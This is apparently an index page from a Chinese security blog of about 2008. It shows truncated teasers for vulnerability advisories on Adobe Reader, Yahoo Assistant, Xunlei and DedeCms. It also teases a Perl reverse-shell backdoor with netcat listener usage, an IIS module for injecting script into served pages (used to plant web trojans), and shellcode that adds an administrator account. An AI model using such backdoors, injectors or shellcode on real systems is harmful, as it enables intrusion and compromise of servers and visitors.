[UPDATE]Adobe Reader/Acrobat Remote PDF Print Silently Vulnerability
by cocoruder([email protected])
http://ruder.cdut.net, updated on 2008.05.06
Summary:
A design error vulnerability exists in Adobe Reader and Adobe Acrobat Professional. A remote attacker who successfully exploit this vulnerability can control the printer without user’s permission.
Affected Software Versions:
Adobe Reader 8.1.1 and earlier versions
Adobe Acrobat Professional, 3D and Standard 8.1.1 and earlier versions
Details:
This vulnerablity due to the design error of the javascript fucntion “DOC.print()”, following are the annotates of the function in Adobe’s Javascript API Reference(named “js_api_reference.pdf”):
阅读全文 »
Tags: Adobe,
Adobe Acrobat Reader,
Adobe Reader,
Advisory,
Vulnerability
来源:
发现者: Sowhat of Nevis Labs
日期: 2008.05.06
http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt
CVE: N/A
厂商
Yahoo! CN
受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
阅读全文 »
Tags: Activex,
Yahoo!,
漏洞
作者:疯狗
以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口
C:\>netstat -na|find “36897”
TCP 127.0.0.1:36897 0.0.0.0:0 LISTENING
绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。
……
23132CBE 68 B4C61323 push 2313C6B4 ; ASCII “savepath”
23132CC3 57 push edi
23132CC4 FFD6 call esi
23132CC6 59 pop ecx
23132CC7 84C0 test al, al
阅读全文 »
Tags: PoC,
迅雷
作者:小杰
都是使用nc监听!
反向连接代码:
#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type 'exit' to exit or press Enter to gain shell when u under the 'console'.
#nc -vv -l -p 1988
#perl backdoor.pl 127.0.0.1 1988
阅读全文 »
Tags: BackDoor,
Perl
来源:安全警戒线论坛
用于向网页中插入代码,支持iframe以及script 标签。
原本这程序是别人定做的,因为交易方式的分歧,闹的不惶而散。
看到群里有人不知道在那弄到的,当成宝贝是的,既然没交易,就发出来吧。
原本人家是用来挂广告的,让有心人用来挂马用了
原理很简单,就是在IIS应用程序池isapi,特点是解决了win2003假死问题,缩短IIS应用池回收时间。
测试环境WIN2003+IIS XPSP2+IIS WIN2000没测试。
首先打开GetID.exe获取注册号,运行IIS_AD.exe生成DLL文件,加载到IIS应用池就OK了
有了他服务器任何的一个页面都会有广告代码或者网马代码。
之后修改IIS_AD.ini里的内容:
[IIS_AD]
ADjs=<script language='javascript'>alert('Welcome to User IIS AD !');</script>
支持iframe以及script 标签。
阅读全文 »
Tags: IIS
来源:Ph4nt0m Google Group
by [email protected]
QQ:378367942
\include\inc_bookfunctions.php
—————————————————
……
function WriteBookText($cid,$body)
{ 阅读全文 »
Tags: DedeCms,
Vulnerability
文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
1、//win2003+sp2下加入一个test11/Test11!!!管理员用户的shellcode:
阅读全文 »
Tags: shellcode
作者:cnqing
来源:cncert
CTProxy beta
软件功能:
可自定义HTTP头的本地代理,源于WVS的HttpSniff(Trap)
使用方法:
1.设置代理端口
2.开启或禁用 trap
3.设置http头,和对应的值,注意保存。
4.设置IE的代理为127.0.0.1 和第一步中的端口
5.Start
注意:需要.net framework环境运行
阅读全文 »
Tags: cncert,
CTProxy